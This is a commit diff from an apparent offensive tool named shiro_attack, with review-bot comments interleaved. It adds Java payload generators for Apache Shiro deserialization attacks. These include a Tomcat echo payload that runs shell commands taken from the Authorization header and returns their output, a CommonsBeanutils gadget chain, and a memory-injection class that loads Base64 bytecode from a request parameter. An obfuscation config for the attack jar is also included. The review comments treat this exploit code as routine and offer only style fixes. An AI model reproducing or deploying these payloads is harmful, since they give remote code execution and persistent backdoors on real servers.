dy to user
SummerSec committed Feb 18, 2022
1 parent 949917d commit 9c0c5c6
Showing 17 changed files with 537 additions and 4 deletions.
8 changes: 6 additions & 2 deletions pom.xml
Expand Up @@ -236,7 +236,7 @@
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.13.3</version>
<version>2.14.1</version>
</dependency>
<dependency>
<groupId>com.arronlong</groupId>
Expand Down Expand Up @@ -300,7 +300,11 @@
<artifactId>hutool-all</artifactId>
<version>5.7.13</version>
</dependency>

<dependency>
<groupId>javassist</groupId>
<artifactId>javassist</artifactId>
<version>3.12.0.GA</version>
</dependency>

</dependencies>

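Review bot: The `javassist:javassist:3.12.0.GA` coordinate added in the second hunk is the legacy groupId; current Javassist releases ship under `org.javassist:javassist`, and because Maven resolves conflicts per groupId, a newer `org.javassist` copy arriving transitively would not replace this one but sit beside it on the class path with the same package names. Pin `org.javassist:javassist` at a maintained version instead, unless this old API level is deliberately required. The first hunk moves `log4j-api` to 2.14.1; if a `log4j-core` dependency is declared elsewhere in this pom (outside this view) it presumably tracks the same version, and 2.14.1 still predates the JNDI-lookup fixes released in late 2021, so the pair should be raised together. The diffstat reports 6 additions and 2 deletions while only 5 and 1 are visible here, so a third hunk lies outside this view.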
Expand Up @@ -77,6 +77,7 @@ public CtClass genPayload(final ClassPool pool) throws CannotCompileException, N
" if (var3 != null && !var3.isEmpty()) {\n" +
" var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n" +
" var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Host\"), var3});\n" +
// " var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Setcoolie\"), var3});\n" +
" var4 = true;\n" +
" }\n" +
"\n" +
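Review bot: The only added line is commented-out code inside the generated-source string, and its header name `Setcoolie` appears to be a typo, so the line documents nothing and will confuse the next reader. Delete it, or if it records a variant that was tried and rejected, replace it with a one-line `//` comment stating why it was dropped. `genPayload` begins and ends outside this hunk.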
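--- a/src/main/java/com/summersec/attack/deser/echo/TomcatEcho2.java
+++ b/src/main/java/com/summersec/attack/deser/echo/TomcatEcho2.java
@@ -0,0 +1,128 @@
+package com.summersec.attack.deser.echo;
+
+import javassist.*;
+
+import java.io.IOException;
+
+/**
+* @ClassName: TomcatEcho2
+* @Description: TODO
+* @Author: Summer
+* @Date: 2022/1/19 11:33
+* @Version: v1.0.0
+* @Description:
+**/
+public class TomcatEcho2 implements EchoPayload{
+@Override
+public CtClass genPayload(final ClassPool pool) throws CannotCompileException, NotFoundException, IOException {
+final CtClass clazz = pool.makeClass("com.summersec.x.Test" + System.nanoTime());
+if (clazz.getDeclaredConstructors().length != 0) {
+clazz.removeConstructor(clazz.getDeclaredConstructors()[0]);
+}
+
+
+
+clazz.addMethod(CtMethod.make(" private static void writeBody(Object var0, byte[] var1) throws Exception {\n" +
+" byte[] bs = (\"$$$\" + org.apache.shiro.codec.Base64.encodeToString(var1) + \"$$$\").getBytes();\n" +
+" Object var2;\n" +
+" Class var3;\n" +
+" try {\n" +
+" var3 = Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\");\n" +
+" var2 = var3.newInstance();\n" +
+" var3.getDeclaredMethod(\"setBytes\", new Class[]{byte[].class, int.class, int.class}).invoke(var2, new Object[]{bs, new Integer(0), new Integer(bs.length)});\n" +
+" var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" +
+" } catch (Exception var5) {\n" +
+" var3 = Class.forName(\"java.nio.ByteBuffer\");\n" +
+" var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n" +
+" var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" +
+" } \n" +
+" }",clazz));
+
+clazz.addMethod(CtMethod.make(" private static Object getFV(Object var0, String var1) throws Exception {\n" +
+" java.lang.reflect.Field var2 = null;\n" +
+" Class var3 = var0.getClass();\n" +
+"\n" +
+" while(var3 != Object.class) {\n" +
+" try {\n" +
+" var2 = var3.getDeclaredField(var1);\n" +
+" break;\n" +
+" } catch (NoSuchFieldException var5) {\n" +
+" var3 = var3.getSuperclass();\n" +
+" }\n" +
+" }\n" +
+"\n" +
+" if (var2 == null) {\n" +
+" throw new NoSuchFieldException(var1);\n" +
+" } else {\n" +
+" var2.setAccessible(true);\n" +
+" return var2.get(var0);\n" +
+" }\n" +
+" }", clazz));
+clazz.addConstructor(CtNewConstructor.make("public TomcatEcho() throws Exception {\n" +
+" boolean var4 = false;\n" +
+" Thread[] var5 = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n" +
+" for (int var6 = 0; var6 < var5.length; ++var6) {\n" +
+" Thread var7 = var5[var6];\n" +
+" if (var7 != null) {\n" +
+" String var3 = var7.getName();\n" +
+" if (!var3.contains(\"exec\") && var3.contains(\"http\")) {\n" +
+" Object var1 = getFV(var7, \"target\");\n" +
+" if (var1 instanceof Runnable) {\n" +
+" try {\n" +
+" var1 = getFV(getFV(getFV(var1, \"this$0\"), \"handler\"), \"global\");\n" +
+" } catch (Exception var13) {\n" +
+" continue;\n" +
+" }\n" +
+" java.util.List var9 = (java.util.List) getFV(var1, \"processors\");\n" +
+"\n" +
+" for(int var10 = 0; var10 < var9.size(); ++var10) {\n" +
+" Object var11 = var9.get(var10);\n" +
+" var1 = getFV(var11, \"req\");\n" +
+" Object var2 = var1.getClass().getMethod(\"getResponse\",new Class[0]).invoke(var1, new Object[0]);\n" +
+" try {\n" +
+"\n" +
+"\n" +
+" var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Host\")});\n" +
+" if (var3 != null && !var3.isEmpty()) {\n" +
+" var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n" +
+" var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Host\"), var3});\n" +
+" var4 = true;\n" +
+" }\n" +
+"\n" +
+" var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Authorization\")});\n" +
+" if (var3 != null && !var3.isEmpty()) {\n" +
+" var3 = org.apache.shiro.codec.Base64.decodeToString(var3.replaceAll(\"Basic \", \"\"));\n" +
+" String[] var12 = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", var3} : new String[]{\"/bin/sh\", \"-c\", var3};\n" +
+" writeBody(var2, (new java.util.Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter(\"\\\\A\").next().getBytes());\n" +
+" var4 = true;\n" +
+" }\n" +
+"\n" +
+" if (var4) {\n" +
+" break;\n" +
+" }\n" +
+" }catch (Exception var14) {\n" +
+" writeBody(var2, var14.getMessage().getBytes());\n" +
+" }\n" +
+" }\n" +
+"\n" +
+" if (var4) {\n" +
+" break;\n" +
+" }\n" +
+" }\n" +
+" }\n" +
+" }\n" +
+" }\n" +
+" }",clazz));
+
+return clazz;
+}
+
+
+public static void main(String[] args) throws NotFoundException, CannotCompileException, IOException {
+ClassPool pool = ClassPool.getDefault();
+// TomcatEcho2 tomcatEcho2 = new TomcatEcho2();
+SpringEcho springEcho = new SpringEcho();
+springEcho.genPayload(pool);
+// tomcatEcho2.genPayload(pool);
+}
+}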
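Review bot: `main` at the end of `TomcatEcho2` is a leftover debug hook: it builds a `SpringEcho` payload instead of this class and keeps two commented-out `tomcatEcho2` lines, so it neither exercises nor documents the class; delete it, or have it call `new TomcatEcho2().genPayload(pool)` if a smoke check is wanted. The class Javadoc is an unfilled template (`@Description: TODO`, then an empty second `@Description`) and should state what `genPayload` produces and that the generated source hard-codes `org.apache.shiro.codec.Base64`, so the emitted class only links where Shiro's codec package is present. The `getFV` source string duplicates the one in the InjectMemTool hunk of this same commit; a single shared constant would stop the two copies drifting. The three blank lines after the constructor-removal `if` and the inconsistent `" }",clazz)` versus `" }", clazz)` spacing are formatting noise google-java-format would remove.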
@@ -0,0 +1,57 @@
package com.summersec.attack.deser.payloads;

import com.summersec.attack.deser.payloads.annotation.Authors;
import com.summersec.attack.deser.payloads.annotation.Dependencies;
import com.summersec.attack.deser.util.JavassistClassLoader;
import com.summersec.attack.deser.util.Reflections;
import java.util.Comparator;
import java.util.PriorityQueue;
import java.util.Queue;

import com.summersec.attack.deser.util.StandardExecutorClassLoader;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtField;


@Dependencies({"commons-beanutils:commons-beanutils:1.6.1"})
@Authors({"phith0n"})
public class CommonsBeanutilsString_192s implements ObjectPayload<Queue<Object>> {
@Override
public Queue<Object> getObject(Object template) throws Exception {

ClassPool pool = ClassPool.getDefault();
pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator")));
final CtClass beanComparator = pool.get("org.apache.commons.beanutils.BeanComparator");

try {
CtField ctSUID = beanComparator.getDeclaredField("serialVersionUID");
beanComparator.removeField(ctSUID);
}catch (javassist.NotFoundException e){}
beanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", beanComparator));
// mock method name until armed
final Comparator comparator = (Comparator)beanComparator.toClass(new JavassistClassLoader()).newInstance();
beanComparator.defrost();

PriorityQueue<String> queue = new PriorityQueue(2, (Comparator<?>)comparator);

queue.add("1");
queue.add("1");

Reflections.setFieldValue(queue, "queue", new Object[] { template, template });

Reflections.setFieldValue(beanComparator, "property", "outputProperties");

return (Queue)queue;
}

public static void main(String[] args) throws Exception {
CommonsBeanutilsString_192s commonsBeanutilsString192 = new CommonsBeanutilsString_192s();
commonsBeanutilsString192.getObject(new Object());

}
}
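Review bot: `catch (javassist.NotFoundException e){}` in `getObject` swallows the lookup failure without a word; presumably the field is simply absent on some beanutils builds and the next line adds the replacement either way, so write that down: `} catch (javassist.NotFoundException ignored) { // no serialVersionUID declared on this beanutils build; replaced below }`. The method also uses raw `Comparator` and `PriorityQueue` with an unchecked `(Comparator<?>)` cast, and `Class.newInstance()` has been deprecated since Java 9 in favour of `getDeclaredConstructor().newInstance()`. The trailing `main` builds the queue with a bare `new Object()` template and discards the result, so it is a leftover debug hook rather than a test; drop it. A class-level Javadoc tying the hard-coded `serialVersionUID` to the version named in `@Dependencies` would explain the field rewrite to the next reader.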



Expand Up @@ -17,7 +17,7 @@ public CtClass genPayload(ClassPool pool) throws Exception {
}
clazz.addMethod(CtMethod.make(" private static Object getFV(Object o, String s) throws Exception {\n java.lang.reflect.Field f = null;\n Class clazz = o.getClass();\n while (clazz != Object.class) {\n try {\n f = clazz.getDeclaredField(s);\n break;\n } catch (NoSuchFieldException e) {\n clazz = clazz.getSuperclass();\n }\n }\n if (f == null) {\n throw new NoSuchFieldException(s);\n }\n f.setAccessible(true);\n return f.get(o);\n}", clazz));

clazz.addConstructor(CtNewConstructor.make(" public InjectMemTool() {\n try {\n Object o;\n String s;\n String dy = null;\n Object resp;\n boolean done = false;\n Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n for (int i = 0; i < ts.length; i++) {\n Thread t = ts[i];\n if (t == null) {\n continue;\n }\n s = t.getName();\n if (!s.contains(\"exec\") && s.contains(\"http\")) {\n o = getFV(t, \"target\");\n if (!(o instanceof Runnable)) {\n continue;\n }\n\n try {\n o = getFV(getFV(getFV(o, \"this$0\"), \"handler\"), \"global\");\n } catch (Exception e) {\n continue;\n }\n\n java.util.List ps = (java.util.List) getFV(o, \"processors\");\n for (int j = 0; j < ps.size(); j++) {\n Object p = ps.get(j);\n o = getFV(p, \"req\");\n resp = o.getClass().getMethod(\"getResponse\", new Class[0]).invoke(o, new Object[0]);\n\n Object conreq = o.getClass().getMethod(\"getNote\", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});\n\n dy = (String) conreq.getClass().getMethod(\"getParameter\", new Class[]{String.class}).invoke(conreq, new Object[]{new String(\"dy\")});\n\n if (dy != null && !dy.isEmpty()) {\n byte[] bytecodes = org.apache.shiro.codec.Base64.decode(dy);\n\n java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(\"defineClass\", new Class[]{byte[].class, int.class, int.class});\n defineClassMethod.setAccessible(true);\n\n Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});\n\n cc.newInstance().equals(conreq);\n done = true;\n }\n if (done) {\n break;\n }\n }\n }\n }\n } catch (Exception e) {\n ;\n }\n}", clazz));
clazz.addConstructor(CtNewConstructor.make(" public InjectMemTool() {\n try {\n Object o;\n String s;\n String user = null;\n Object resp;\n boolean done = false;\n Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n for (int i = 0; i < ts.length; i++) {\n Thread t = ts[i];\n if (t == null) {\n continue;\n }\n s = t.getName();\n if (!s.contains(\"exec\") && s.contains(\"http\")) {\n o = getFV(t, \"target\");\n if (!(o instanceof Runnable)) {\n continue;\n }\n\n try {\n o = getFV(getFV(getFV(o, \"this$0\"), \"handler\"), \"global\");\n } catch (Exception e) {\n continue;\n }\n\n java.util.List ps = (java.util.List) getFV(o, \"processors\");\n for (int j = 0; j < ps.size(); j++) {\n Object p = ps.get(j);\n o = getFV(p, \"req\");\n resp = o.getClass().getMethod(\"getResponse\", new Class[0]).invoke(o, new Object[0]);\n\n Object conreq = o.getClass().getMethod(\"getNote\", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});\n\n user = (String) conreq.getClass().getMethod(\"getParameter\", new Class[]{String.class}).invoke(conreq, new Object[]{new String(\"user\")});\n\n if (user != null && !user.isEmpty()) {\n byte[] bytecodes = org.apache.shiro.codec.Base64.decode(user);\n\n java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(\"defineClass\", new Class[]{byte[].class, int.class, int.class});\n defineClassMethod.setAccessible(true);\n\n Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});\n\n cc.newInstance().equals(conreq);\n done = true;\n }\n if (done) {\n break;\n }\n }\n }\n }\n } catch (Exception e) {\n ;\n }\n}", clazz));

return clazz;
}
@@ -0,0 +1,15 @@
package com.summersec.attack.deser.util;

/**
* @ClassName: JavassistClassLoader
* @Description: TODO
* @Author: Summer
* @Date: 2022/1/24 16:34
* @Version: v1.0.0
* @Description:
**/
public class JavassistClassLoader extends ClassLoader {
public JavassistClassLoader(){
super(Thread.currentThread().getContextClassLoader());
}
}
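Review bot: The Javadoc is an unfilled template (`@Description: TODO`, then an empty second `@Description`) and does not say why this class exists: `ClassLoader`'s constructors are `protected`, so a subclass is the only way to obtain a plain loader parented to the thread context loader, which `CtClass.toClass(new JavassistClassLoader())` in the beanutils payload of this commit relies on. Replace the header with that explanation, e.g. `/** Plain ClassLoader parented to the current thread's context loader; exists only because ClassLoader's constructor is protected. Used as the target loader for CtClass.toClass. */`. If a fresh instance per call is deliberate (so a repeated class name can be defined again), say so in the same comment; that intent cannot be confirmed from this file alone.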
Expand Up @@ -39,10 +39,11 @@ private void loadResource(String version) {
// 加载对应版本目录下的 Jar 包
tryLoadJarInDir(jarPath);
// 加载对应版本目录下的 lib 目录下的 Jar 包
tryLoadJarInDir(jarPath + File.separator + "lib");
// tryLoadJarInDir(jarPath + File.separator + "lib");
}

private void tryLoadJarInDir(String dirPath) {
System.out.println("Try load jar in dir: " + dirPath);
File dir = new File(dirPath);
// 自动加载目录下的jar包
if (dir.exists() && dir.isDirectory()) {
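Review bot: Commenting out `tryLoadJarInDir(jarPath + File.separator + "lib")` leaves the comment directly above it, which says the version directory's `lib` jars are loaded, describing behaviour that no longer happens, and leaves no record of why the directory was dropped. Either delete both lines or replace the pair with a comment stating the reason, e.g. `// lib/ is no longer scanned: <reason>`. If some version directories still depend on jars under `lib`, the change makes them fail silently later rather than at load time, so a `System.out.println` noting the skipped directory, matching the existing message in `tryLoadJarInDir`, would help. `loadResource` begins outside this hunk.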
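--- a/src/main/resources/allatori.xml
+++ b/src/main/resources/allatori.xml
@@ -0,0 +1,34 @@
+<!--allatori配置文件-->
+<config>
+<!-- <!\-\- 输入和输出jar配置,out指向的是加密后的jar &ndash;&gt;-->
+<input>
+<!-- <jar in="shiro_attack-4.3-SNAPSHOT.jar" out="obf-shiro_attack-4.3-SNAPSHOT.jar"/>-->
+<jar in="shiro_attack-4.4-SNAPSHOT-all.jar" out="obf-shiro_attack-4.4-SNAPSHOT-all.jar"/>
+</input>
+<!-- <!\-\- 加水印 &ndash;&gt;-->
+<watermark key="shiro_attack" value="developer: SummerSec"/>
+<!-- <!\-\- 需要保留原来类名的配置 &ndash;&gt;-->
+<keep-names>
+<class access="protected+">
+<field access="protected+"/>
+<method access="protected+"/>
+</class>
+<class template="class com.xxx.xxx.*"/>
+
+</keep-names>
+
+<property name="log-file" value="log.xml"/>
+<ignore-classes>
+<class template="class \*springframework\*"/>
+<class template="class \*shardingjdbc\*"/>
+<class template="class \*jni\*"/>
+<class template="class \*alibaba\*"/>
+<class template="class \*persistence\*"/>
+<class template="class \*apache\*"/>
+<class template="class \*mybatis\*"/>
+<!-- <!\-\- 排除包下的类,可单个到具体,注意此处一定要排除掉springboot项目的启动类 &ndash;&gt;-->
+<class template="class com.apache.*"/>
+<class template="class org.apache.http.entity.StringEntity"/>
+<class template="class org.apache.cxf.*"/>
+</ignore-classes>
+</config>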
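Review bot: `<class template="class com.xxx.xxx.*"/>` under `<keep-names>` looks like an unedited placeholder from a sample Allatori config; this project's code lives under `com.summersec`, so the entry keeps nothing. Name the packages whose class names must survive obfuscation (the payload classes in this commit are resolved by name through javassist and reflection, which renaming would presumably break) or remove the line. The commented-out 4.3 `<jar .../>` line and the `<!-- <!\-\- ... &ndash;&gt;-->` double-escaped comments are leftovers from an editor's comment toggling and should be restored to plain `<!-- ... -->` comments. The `<watermark>` embeds `developer: SummerSec` in every produced jar; if that is intended, a one-line comment saying so would stop a later reader treating it as accidental.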
